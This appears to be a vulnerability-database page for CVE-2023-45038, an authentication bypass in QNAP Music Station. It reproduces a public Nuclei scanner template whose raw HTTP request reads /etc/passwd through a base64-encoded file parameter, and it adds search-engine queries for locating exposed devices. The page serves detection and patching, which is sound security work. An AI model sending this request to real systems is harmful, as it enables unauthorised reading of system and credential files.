CVE-2023-45038: QNAP Music Station < 5.4.0 - Authentication Bypass

日期: 2025-12-12 | 影响软件: QNAP Music Station | POC: 已公开

漏洞描述

An improper authentication vulnerability has been reported to affect Music Station. If exploited, the vulnerability could allow users to compromise the security of the system via a network. We have already fixed the vulnerability in the following version: Music Station 5.4.0 and later

PoC代码[已公开]

id: CVE-2023-45038

info:
  name: QNAP Music Station < 5.4.0 - Authentication Bypass
  author: daffainfo
  severity: medium
  description: |
    An improper authentication vulnerability has been reported to affect Music Station. If exploited, the vulnerability could allow users to compromise the security of the system via a network. We have already fixed the vulnerability in the following version: Music Station 5.4.0 and later
  impact: |
    Unauthenticated attackers can bypass authentication in Music Station to read arbitrary files from the QNAP system including /etc/passwd, potentially accessing sensitive configuration files and user credentials.
  remediation: |
    Update QNAP Music Station to version 5.4.0 or later that implements proper authentication validation in the as_get_file_api.php endpoint.
  reference:
    - https://www.qnap.com/en/security-advisory/qsa-24-25
    - https://karzemrok.com/qnap-qsa-24-25
    - https://nvd.nist.gov/vuln/detail/CVE-2023-45038
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2023-45038
    epss-score: 0.06473
    epss-percentile: 0.9082
    cwe-id: CWE-287
    cpe: cpe:2.3:a:qnap:music_station:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: qnap
    product: music_station
    shodan-query: http.title:"qnap"
    fofa-query: title="qnap"
    google-query: intitle:"qnap"
  tags: cve,cve2023,qnap,music_station,auth-bypass,vkev

http:
  - raw:
      - |
        POST /musicstation/api/as_get_file_api.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ssid=dummy&songid=1&tt=ts&f=L2V0Yy9wYXNzd2Q=

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "admin:.*:0:0:"

      - type: word
        part: content_disposition
        words:
          - "filename='passwd'"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100fdd7b5b16e659614490902e7971608137532d209cc6e80204718989eba3412bb022100ad3d6a9a3c3b4459c1bb6245fbda9776c02ecedbe8cd8d28bf22e94a36f5bfdd:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-45038.yaml

相关漏洞推荐